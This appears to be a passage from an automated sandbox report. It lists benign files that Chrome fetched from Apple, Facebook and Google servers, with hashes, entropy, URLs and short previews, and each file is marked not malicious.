                                                                                                                                                                                                                                SSDEEP:12288:FStzUE3OuNEJNyyg1LQqrKtvswQCgJ4Ofh/XJJwj+8cn:UtzUEzEnyygdvKdKX4OpvJJy+v
                                                                                                                                                                                                                                MD5:8549ACDDE0F6BEEB2B3A2EE041B47CD4
                                                                                                                                                                                                                                SHA1:D851CE66DA4F8D156F0CE71DE1437A74EE4F7D13
                                                                                                                                                                                                                                SHA-256:62C83C63FE413C31B56A89A6181D7E505A8D71642B706C26DFBB033A344C5CA2
                                                                                                                                                                                                                                SHA-512:A015ED7444C235261C2C7E9877DD9AC780D6C3ECFB9D15438CD78DEA9CABADC3FBA5ABB88F58870680158885317909B42FEAA7F21A40C85A611A5E1DADD3A714
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/7d/63/19/7d631997-4ce4-6ce9-9141-f0ad3602b2a9/P875466468_Anull_video_gr250_sdr_652x1412-.mp4:2f81d12bd32b61:4
                                                                                                                                                                                                                                Preview:.+0...<..el.r.QKL....uv#<...yjRm.>t...].y7YKE.....s.z...\.t..J..%.,6....@_.@.(...[W.;F.h...<.<g.;.....x.h..C.G.b..y.T.-0h3h.lz..`q....2W3..].6=....<u.$m..A 4fk.T...C.q^.eq....L.uB....A.@/dve+.<.....\...z.$..F.I............W..RN..%.....s.9.Pl......v..F..V".....w%.*..._.8.'.q.c...k....vo...S?.....%..8ZW."......\&".....<F...j.......k|+....6...5KN.h.l^......4.Q....FLl..L..S2...x..1....j8.X.b.B(...m1..l........}..e....."bI.....Ir2v.iHi...M.z;(.B.L.M|bc..3-......... .c.6...Rq..W......*....w.B2L..U..........8.U~+...wLF..M.L@R...\[..N....A+R...l..rl7v....j.K.F....cq,..t..K.M.o............86$.&....$..]..C.V$2...](}>........bVzIX ..Q.yi.<..x2#..g.,../;6^.64\..C.=...!.`G.j...@..?_f..:G..C3.......Zb......"B..!....0....M!.."._.:....L.&]O: rO.{4...).>yW........I..z....>....TX...cj?Xwg... j.U...nk8..". ...BA)...A.8S.....r.u.*......0...-..........-.w|hG.*......:s.......S).(...Z_.':.>....%........G..~..g.."..%G./....NS=;.........L..0X....H..6a.."Z;..OPy
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (1328)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):349993
                                                                                                                                                                                                                                Entropy (8bit):5.357908617608227
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:IaurdhEIEvAr/1G93xWLF+cqt6UqZSebMIzb7CnBWQahL:Ifr/1G93xWJnH7EWQ8L
                                                                                                                                                                                                                                MD5:E3898CF886FE061B936CBEA3F51E872D
                                                                                                                                                                                                                                SHA1:31D6E7833F1FFC22993E1B8B1A3C56C9A19EA89A
                                                                                                                                                                                                                                SHA-256:2C30DDD4EA9E0B822C9A01C8E83DAEEE51AE059665BD4507CD382017E8E8B1B3
                                                                                                                                                                                                                                SHA-512:E18A69D9F735007B8B4B5042A02378B78972A71AF54543B44449B07BCA2A8E806945824749EE217B35DEC00B31BA759D69652AD0317210C29C17DA812D233780
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.739.25e60d65f7e9bdd75f12.js
                                                                                                                                                                                                                                Preview:/*! For license information please see chunk.739.25e60d65f7e9bdd75f12.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[739],{2353:function(e,t,r){"use strict".r.r(t),r.d(t,{KNOWN_CAMPAIGN_AND_AFFILIATE_QUERY_PARAMS:function(){return n},KNOWN_MARKETING_QUERY_PARAMS:function(){return a},METRICS_REGISTER_ENDPOINT:function(){return o},MUSIC_AFFILIATIONS_ENDPOINT:function(){return u},PROCESS_REDIRECT_URL_ENDPOINT:function(){return i},TV_AFFILIATIONS_ENDPOINT:function(){return s},default:function(){return f},handleCampaignAndAffiliateUrls:function(){return c}}).var n=["affC","adId","advp","at","ct","itsct","itscg","itscc","itcCt","its_qt","ls","partnerId","pt","qtkid","uo"],a=["mttn3pid","mttnagencyid","mttncc","mttnmyad","mttnmyadg","mttnmycmp","mttnmykw","mttnmypla","mttnmypub","mttnmysite","mttnpid","mttnrefid","mttnsiteid","mttnsub1","mttnsub2","mttnsub3","mttnsubad","mttnsubadgp","mttnsubcmp","mttnsubkw","mttnsubpid","mttnsubplmnt"
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (18847)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):49907
                                                                                                                                                                                                                                Entropy (8bit):5.9066923979290396
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:ZZH2/m10GGt5iNc0pumTzjmYpoHxXlJZNTiAJoyTyTX4dZjrn:ZZHMs0GGt5VmTu/lpTwhTX4T
                                                                                                                                                                                                                                MD5:1A40456AA37A01253ACA69481BC9ABBC
                                                                                                                                                                                                                                SHA1:1E42A218F7E6AD2F395E9124A6A12A3C2C62FC69
                                                                                                                                                                                                                                SHA-256:FE2C517F35E91D30872BC3E76B5B90FE316E64D395B7490DD763095EE9B1392E
                                                                                                                                                                                                                                SHA-512:85A9B3BE0819AAE76462AB1CFF446703DE41D7FE38C32A5B1CA1F2F114EAFF38BB6FF948E58D22510E070D61495E5D836D9B2B7E831BE8D0149DD1AD517106E5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/7QNyOKeJP6X.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("LoginFormToggle",["cx","CSS","DOM","ge"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a,b){var e=c("ge")("pass");d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").addClass(b,"_9ls8")):d("CSS").hide(a)});var f=!0;Event.listen(a,"click",function(){f=!f,d("CSS").removeClass(b,f?"_9ls9":"_9ls8"),d("CSS").addClass(b,f?"_9ls8":"_9ls9"),c("DOM").setAttributes(e,{type:f?"password":"text"})});var g=c("ge")("passContainer");g!==null&&(Event.listen(e,"focus",function(){d("CSS").addClass(g,"_9nyi"),d("CSS").removeClass(g,"_9nyh")}),Event.listen(e,"focusout",function(){d("CSS").addClass(g,"_9nyh"),d("CSS").removeClass(g,"_9nyi")}))}function b(a,b,e,f){d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").addClass(b,"_9ls8")):d("CSS").hide(a)});var g=!0;Event.listen(a,"click",function(){g=!g,d("CSS").removeClass(b,g?"_9ls9":"_9ls8"),d("CSS").addClass
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 65 x 284, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):5029
                                                                                                                                                                                                                                Entropy (8bit):7.83131265888807
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:yXt3SMoogy0d5ktPLPhTaRMg+jGg2amgVK8FIKpryA6QSkbp5cizSX:5MTawtLhT/jQa7xFIKgg54f
                                                                                                                                                                                                                                MD5:C3534300C6C7688FBB99B7CA94DE7B8D
                                                                                                                                                                                                                                SHA1:BA4187E2B35E25690886CAA9938F3EDB8B62DA41
                                                                                                                                                                                                                                SHA-256:55DB8120E6575014C5701E306B8E145FEF14C858162298234DF891BDACABE2FC
                                                                                                                                                                                                                                SHA-512:876E2C44E35E5BBC59C361E466A8316C67E4F26187DFDB6AE3316622D98A04CC48D788776AA61468C3C2C35696E1E7D1D3030424DCFF1D67FFD648C3B97FD178
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yw/r/Jen4pUvOoRZ.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...A..........N).....PLTE....7H.............. GpL.....................................83...........=|..........................................!...........................hhi............z........JNU...-x....2y................`gq........###.5<.........H............q........@.%c.......................___LNQ..........q..q.JNU@.%...S........-w....c...q.`gq.........D.".../x..q.c..@.%.........JNUc..JNU...."&......2y..5<.5<.5<2y..5<.5<.5<JNU...JNU@.%.q.2y.@.%2y.xxx`gq........`gq2y.@.%..........5<...........................:::...UUU......`gq`gq........................q........jkm-w..2y....`gq...c........@.%..............000.5<,w.`gq....5<2y..........I....................111...R...........@.%@.%@.%...ssssss...JNU.q...c..2y.......JNU....q..5<@.%...c............`gq.'^T....tRNS.......-.."..Z..>........'...I=..k.......v...8........Du..f..5[3..pN..o.3.bT...e[&...1....>.....L`O.a).{...#.......*...).y...*...f.*....wd.b...p.5........u-z......{...|..:...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2796)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):29202
                                                                                                                                                                                                                                Entropy (8bit):5.416734730710893
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E32cy+EbepIFzTbeQzP9/1VwNxmkNP71u4Bh6BIKMzXHtX:uy+Ebe+hTbJNWxp5Nh6BzMzX5
                                                                                                                                                                                                                                MD5:A7C2579885C6D3E48C485B590C75C7B5
                                                                                                                                                                                                                                SHA1:4925F9BA613A1FFCAFDE1A8C94BDF222D6B794B6
                                                                                                                                                                                                                                SHA-256:715AE0EBFC7BF06C2BEEBCA8A4C9C4BFFB5AD215FA980B71541EBD99AB864423
                                                                                                                                                                                                                                SHA-512:1F868DBD8A3C20CD087E0D78423606D77E306AC25A50CD92947CBAAEB21C85225FF474C9E8DD7F86D254B1ABD458194F4BEA0B6E507B4B631401B2BC3D755409
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/pRN8RJz6VlO.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("DeferredComponent.react",["createCancelableFunction","react"],(function(a,b,c,d,e,f){var g,h=g||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(b,c){var d;d=a.call(this,b,c)||this;d.cancelableModulesLoaded=function(){};d.$1=function(a){d.setState({ComponentClass:a},function(){d.props.onComponentLoad&&d.props.onComponentLoad(a)})};var e=null;function f(a){e=a}d.props.deferredComponent(f);d.state={ComponentClass:e};return d}var d=c.prototype;d.componentDidMount=function(){this.cancelableModulesLoaded=b("createCancelableFunction")(this.$1),this.props.deferredComponent(this.cancelableModulesLoaded)};d.componentWillUnmount=function(){this.cancelableModulesLoaded.cancel()};d.render=function(){var a=this.state.ComponentClass;if(!a||this.props.deferredForcePlaceholder)return this.props.deferredPlaceholder;var b=this.props;b.deferredPlaceholder;b.deferredComponent;b.onComponentLoad;b.deferredForcePlaceholder;b=babelHelpers.objectWithoutPr
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (18847)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):49907
                                                                                                                                                                                                                                Entropy (8bit):5.9066923979290396
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:ZZH2/m10GGt5iNc0pumTzjmYpoHxXlJZNTiAJoyTyTX4dZjrn:ZZHMs0GGt5VmTu/lpTwhTX4T
                                                                                                                                                                                                                                MD5:1A40456AA37A01253ACA69481BC9ABBC
                                                                                                                                                                                                                                SHA1:1E42A218F7E6AD2F395E9124A6A12A3C2C62FC69
                                                                                                                                                                                                                                SHA-256:FE2C517F35E91D30872BC3E76B5B90FE316E64D395B7490DD763095EE9B1392E
                                                                                                                                                                                                                                SHA-512:85A9B3BE0819AAE76462AB1CFF446703DE41D7FE38C32A5B1CA1F2F114EAFF38BB6FF948E58D22510E070D61495E5D836D9B2B7E831BE8D0149DD1AD517106E5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("LoginFormToggle",["cx","CSS","DOM","ge"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a,b){var e=c("ge")("pass");d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").addClass(b,"_9ls8")):d("CSS").hide(a)});var f=!0;Event.listen(a,"click",function(){f=!f,d("CSS").removeClass(b,f?"_9ls9":"_9ls8"),d("CSS").addClass(b,f?"_9ls8":"_9ls9"),c("DOM").setAttributes(e,{type:f?"password":"text"})});var g=c("ge")("passContainer");g!==null&&(Event.listen(e,"focus",function(){d("CSS").addClass(g,"_9nyi"),d("CSS").removeClass(g,"_9nyh")}),Event.listen(e,"focusout",function(){d("CSS").addClass(g,"_9nyh"),d("CSS").removeClass(g,"_9nyi")}))}function b(a,b,e,f){d("CSS").hide(a);Event.listen(e,"keyup",function(){var c=String(e.value);c.length!==0?(d("CSS").show(a),d("CSS").addClass(b,"_9ls8")):d("CSS").hide(a)});var g=!0;Event.listen(a,"click",function(){g=!g,d("CSS").removeClass(b,g?"_9ls9":"_9ls8"),d("CSS").addClass
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4009)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):29711
                                                                                                                                                                                                                                Entropy (8bit):5.317426289518869
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:G13AcfZ02LoynipF5Og2kXGe8IcsGAGzaIlJKIV8EQFayvS+jMC1Kju:a5nipF5OSAIcsGAUdRqELZ+wAKju
                                                                                                                                                                                                                                MD5:9F5BC0996E07E4C660060EF0BE768D39
                                                                                                                                                                                                                                SHA1:BACF1E16033FFF53F72BE731B4AC0D1826EBDB72
                                                                                                                                                                                                                                SHA-256:700531CE6BDFF627D99D5C08A1D2FF91317BF6A2F6FF6F2481FF91B98A0664B8
                                                                                                                                                                                                                                SHA-512:2A17F100F9869C7365E16150473A064A4EDCC56A667F608D7AC4DCD0CED0A2FEBFF9B6D6EE4A07A44B7376B13AC818174D723415AFADF10D7EB117A8A4397102
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3ixu44/yU/l/en_GB/Iud4PfRtk1i.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("FBClipboardLink.react",["cx","fbt","Clipboard","DOMContainer.react","Event","KeyEventController","ReactDOM_DEPRECATED","SubscriptionsHandler","Tooltip.react","isKeyActivation","joinClasses","react","stylex"],(function(a,b,c,d,e,f,g,h,i){var j,k,l=k||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){var b,c;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(b=c=a.call.apply(a,[this].concat(f))||this,c.$1=l.createRef(),c.state={copied:!1,supported:d("Clipboard").isSupported()},c.$2=null,c.$3=null,c.$5=function(a){a.clipboardData&&(a.clipboardData.setData("text/html",c.$8()),a.clipboardData.setData("text",c.$9()),a.preventDefault())},c.$7=function(){if(!c.state.supported)return"Unsupported in this browser";return c.state.copied?c.props.tooltipSuccess:c.props.tooltip},c.$4=function(){c.$3&&(window.clearTimeout(c.$3),c.$3=null)},c.$10=function(){c.$3=window.setTimeout(c.$11,c.props.tooltipSuccessDuration)},c.$6=function
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6078)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9845
                                                                                                                                                                                                                                Entropy (8bit):5.240704384788954
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:zbSDfbbLJTpAX1lsfzNcRMtuzibSDLp1nmtNgb8JzGHzCrKI3qPMc33wBgxOxPHo:z2fbPJu1lsfzNcRg2i27nmtNgolG3XZh
                                                                                                                                                                                                                                MD5:7A5CAC4380406D9DF2E192904976505F
                                                                                                                                                                                                                                SHA1:8F2A83E30BB8C97954B6941E22E91418E16DCD6F
                                                                                                                                                                                                                                SHA-256:C2F0A7C478DBE90FCD594DB0A07442A9802DBBDF3FCA00F4DCDD8F3052879EEF
                                                                                                                                                                                                                                SHA-512:54F3DA732B64E5B1743A75A96B19398AAB933823E7D8E9F98FC700EB2444BF4EAAF82A7CD463F0F29389DC63494A799A072307B4BCBA8D70351319ECB2257216
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yW/r/ypejlg-I21y.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("EmojiRendererData",[],(function(a,b,c,d,e,f){"use strict";a=function(){function a(){}a.isEmoji=function(a){return a>983041||a<35?!1:a===35||a===42||a>=48&&a<=57||a===169||a===174||a===8205||a===8252||a===8265||a===8419||a===8482||a===8505||a>=8596&&a<=8601||a>=8617&&a<=8618||a>=8986&&a<=8987||a===9e3||a===9167||a>=9193&&a<=9203||a>=9208&&a<=9210||a===9410||a>=9642&&a<=9643||a===9654||a===9664||a>=9723&&a<=9726||a>=9728&&a<=9732||a===9742||a===9745||a>=9748&&a<=9749||a===9752||a===9760||a>=9762&&a<=9763||a===9766||a===9770||a>=9774&&a<=9775||a>=9784&&a<=9786||a===9792||a===9794||a>=9800&&a<=9811||a>=9823&&a<=9824||a===9827||a>=9829&&a<=9830||a===9832||a===9851||a>=9854&&a<=9855||a>=9874&&a<=9879||a===9881||a>=9883&&a<=9884||a>=9888&&a<=9889||a===9895||a>=9898&&a<=9899||a>=9904&&a<=9905||a>=9917&&a<=9918||a>=9924&&a<=9925||a===9928||a>=9934&&a<=9935||a===9937||a>=9939&&a<=9940||a>=9961&&a<=9962||a>=9968&&a<=9973||a>=9975&&a<=9976||a===9978||a===9981||a===9986||a==
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4092)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13176
                                                                                                                                                                                                                                Entropy (8bit):5.294987153659635
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58XZIa+UNj42EGkIa+UNjh2EBYgat0b29PRnNGRX2JZun+npvJIxajAQ5uL6:58pNE7NSrt0b29ZnE1KZu+5mx/Q5uO
                                                                                                                                                                                                                                MD5:2645EFD84E35194CF6A31C1F7B29F077
                                                                                                                                                                                                                                SHA1:E6F807F825FEA2575C0EC1BD05B5A305B0C33F0B
                                                                                                                                                                                                                                SHA-256:2530726858E9A0B705EA05C9AF57F2910A9A84871D716D68332E0CB6D306E15D
                                                                                                                                                                                                                                SHA-512:D31EF5851FA2EB31FE84A41A9EE4B0D698742A4C3B4DCE033C02B64E8A1673FE9A20C73BC4BC89C58B703AFE8845748957D017AA95ACEB8BF8CFDEDF8E2377EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("tidyEvent",["Run"],(function(a,b,c,d,e,f,g){var h=[];function i(){while(h.length){var a=h.shift();a.remove?a.remove():a.unsubscribe&&a.unsubscribe()}}function j(a){var b,c=a;function d(){if(!b)return;b.apply(c,arguments);b=null;c=null}if(c&&c.remove)b=c.remove,c.remove=d;else{b=(a=c)==null?void 0:a.unsubscribe;c.unsubscribe=d}return c}function a(a){h.length||d("Run").onLeave(i);if(Array.isArray(a))for(var b=0;b<a.length;b++)a[b]&&h.push(j(a[b]));else a&&h.push(j(a));return a}g["default"]=a}),98);.__d("DeviceBasedLoginForm",["Event","tidyEvent"],(function(a,b,c,d,e,f,g){"use strict";function a(a,b){c("tidyEvent")(c("Event").listen(a,"click",function(a){a.preventDefault(),b.submit()}))}g.init=a}),98);.__d("DeviceBasedLoginUserLoginDialog",["BDClientSignalCollectionTrigger","BDSignalCollectionData","Base64","Button","DOM","Event","FBBrowserPasswordEncryption","LoginServicePasswordEncryptDecryptEventTypedLogger","cx","ge","promiseDone","tidyEvent"],(function(a,b,c,d
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 17 x 569, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2936
                                                                                                                                                                                                                                Entropy (8bit):7.492824796189044
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:Yzg8aI9H81I9fkWIJrZ0TmIWHXU7TILF8qUx9pDshFNVR9WzxogKEuMOXJokI:l8aEc69f9wZ0DgF7Ux9xsd9AbVR
                                                                                                                                                                                                                                MD5:C52099A3430BD9F2A3F30613702ECD1D
                                                                                                                                                                                                                                SHA1:3D93D69D3A7A0485CD8678DAF7C729DFB4E7A93C
                                                                                                                                                                                                                                SHA-256:05E39A5F006C8AFE017A099E13E57762C6CFB42BDE83DD7FBF622D04AE483D5C
                                                                                                                                                                                                                                SHA-512:FE760FD5C097987F1991B06406FA26FDE9B89755305FDC1358B12E3C99BA47832561499EB9977C3DB09EEB5C4181F61F0E4C5DA9EDAF6DEAC5681BFB8434FED8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9.....p.!.....PLTEGpL......JNU777`gq.........BGO`gq...@DJ.........`gq...JNUHLSJNU......`gq......JNU.........`gq.................JNUJNU........JNU...JNUJNU......`gqJNUJNU...JNU......BGO.....777.....777BGO...`gq...bgo>..>..>..>..>..JNU...............JNU......JNU...DHO`gq.........`gqJNUKOV........KOVRW_...............JNU..........................`gq......>.......................`gq...777...BGO...777......>...........JNU..........................`gq...............`gq.........JNU......JNU`gq........................`gq`gq.........JNU...`gq...JNU...........>...........KOV...`gq............`gqKOV........................>..`gq...`gq...............JNUJNUJNU.........JNU...>..>..JNU...JNU............`gq`gq............`gq`gqJNU>.....>..>........JNU>..`gq........BGO777.........f.6m....tRNS.............:p....:.......e...;..lll........I.L........llllll....d.p.Ld.....d:......<T......t........:.88.....6....::::....d.x.......m.....g.E...jXz.....M<*.$(\$.<."`NzbbL..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 109628, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):109628
                                                                                                                                                                                                                                Entropy (8bit):7.997834372736158
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:3072:I/PVzzcH7zULTR9S41qKYgEtXD/PhU/ffXEMY96gYGWPrInVe:+PlLd9N1qjxhYcZW84
                                                                                                                                                                                                                                MD5:67A9B38ABD1F9F80D5ED943760F1C1E6
                                                                                                                                                                                                                                SHA1:9C646D28E62FCF3C4A1ECF7043632FAE3DEA6270
                                                                                                                                                                                                                                SHA-256:8D73261B2DB18AF30E93ACBC8E8591E0784706FC283C37C465F92012256757D2
                                                                                                                                                                                                                                SHA-512:A479BB307B03F74202B24E95D85085E8855C48713E443F5EAE0CABD077D45282F8765BCD6D36733AC336504E1AE1B1C3CA3BB41A428F8A240EE7E7B91FAB39B8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.apple.com/wss/fonts/SF-Pro-Display/v2/sf-pro-display_semibold.woff2
                                                                                                                                                                                                                                Preview:wOF2.......<......xd..................................H.`*H...X...4....6.$..$..(.. ?meta.#..`. 8.t[.w...O.....m...ElU6......#..@dc..~.....1D'I@=h...3.m......*.............w'.H....^....P.P. .("...Y.K..4...i..R..Y.WH1..27..b..J.N.....C.C..'.h...{.f.8.2K9...[&...i/*>b_8@..yX..q..=Qw=.......\Li.t..Q.....`Ov1.i.y............q..4#.(a.7...A8n.|b...{o...Q.0}w.CL..ft...M.b...p...(.s....19...L....l...k.KJ6n...7....F*Zt....|oc.n=l......5~!p.1...SOX.+.dn....Be*.s..}.*T..'.......4y2.*...,u..+U..]..~~.$..O...z....r.dEg.......<..yN%*Q%8}...a.qu..]M...zcGwY...q.!#..,..4......n.X.W..B..s...i...B.`.DD"..b........c1....24w..\G.p....~.4.....M.^x.W.......[.CbS..b4.Q.c..N.."..._....t.-...F...q 'W.O..I......MjBX......?.nF......Ih.y..b.P*.S..A..H..l.v}d.m..~...7.<.?..../...,$.).m&.."Tw....?.v..m..k>;v.Hf...c..."k......$;*....Z...../{.........K.~."cXa..aQf.6[.U....>...d...P....j.diUI.'1...{.w6w.%.P..U....m.X..).%..K.......Z.Pr.2."...66`#kd.....U...E{.U}..^{..._..;..W).
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10246
                                                                                                                                                                                                                                Entropy (8bit):7.978999223454442
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:v7jJbSUZezdwCm4Wx+Xz6IVVfrF2LNaCvVnBlhZBRnQ9MuLl9kJbzJT+XQt6egP2:v7jVwqCm8RbrONaCtBrXRn09kJbEg
                                                                                                                                                                                                                                MD5:7645FD5C78AC035544B12627574D410B
                                                                                                                                                                                                                                SHA1:3F70DC0F130CC0D29EA09ADFD62FF9C525BF2EA6
                                                                                                                                                                                                                                SHA-256:AD79026C7E873DCA90C2DB7D126F63B3A29BC5F5A30C787A63B5C65BFEF17D66
                                                                                                                                                                                                                                SHA-512:33BCD63593F476E4486C8328231F0C28C84808927E3AB8668B91B597B6053C8B69B5EEE5E15CEEB5F05C95335708870C449BF23ADCD72709CDF0CF1E19B82CB5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/JtygOZ9IrtJsXLqQ1DszTLkSGwcRYmOcI6YeBU0ul2vhh9FII7eqZa6Lk2VBcHQiQCav=w526-h296-rw
                                                                                                                                                                                                                                Preview:RIFF.'..WEBPVP8 .'......*..(.>U$.E#.!..8.D.7n..0....~]w.w.!..........c.g._..p.a...?2..|.............?N?..R.o...................~.{......_..w........._.?........6.....K._.S....._P...a.s...../..<|_.;.O...^...._x.E......~..j...;.....5..v.....E..................h?.{../.....+..............a.s........}4.k.k...G...?....9.......w..........=.[./...7.....Ca....Ti.Rt.o2.v.o.}.f...x....'[qt/...E_,....|...7..........P.Q..l.........R.-.....G...L...5.|s.+...z.O.[...dz....b...6.Ku.C...Y..[.V...ea.'.V..y....n.V.?...]W.:.O.}..P.?........d.#LO.h.......:.^.,......:.+..%.....h9q.t...{*.20.ca.NNjm.k..U....P..6..aM.....Q.f..8B...D@..}k......V.yn..b..w....(.,m...d.....+j.n./5k.C?a.ht.W..I...|.-I8.....;$v.3B..;~...JcS.Og.Y.,4.F.P4..QR..P+U-Cq\....8..M......8.z.C|c.UDx|D.^.....s..I.L.M.Url6..r]......GN.C..I .I...HX..u+h".k...-.......`..oMJD.|.Z&...t-y.T...gJ9 .^jM.n.;.Y...I.C..{*.su[....l.iBo9...r..N.@k...{l?..'..$..V;DI..R.7X.|..L%.8.......,.....W+...X,swp>l.Y.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (35297)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):146544
                                                                                                                                                                                                                                Entropy (8bit):5.693066609916641
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:xjMLI23A/RkX4CMMMx4wySAWh/fH6i4mpsWyE96PatWf1atHp:xjMLI23A/RkJOyjiTWf1ar
                                                                                                                                                                                                                                MD5:F919798AF73D9EDB7029150EFFED7938
                                                                                                                                                                                                                                SHA1:4DB71EA1E3ADB27E6BF6F42CA22D51D16412D789
                                                                                                                                                                                                                                SHA-256:116F1CAABFAB3BC63EA2134EC0377CC250CCE9F9B396E24EF2914ACDCE9B99E2
                                                                                                                                                                                                                                SHA-512:9BD995DBC8C48F86DA95EFF7A8260EB0457F8C38ED8056C9CD9DDD4DAC8383951CDEC2095FCAA0484D470BD4DB2000589C17414413DFF30E4A801633A0169485
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
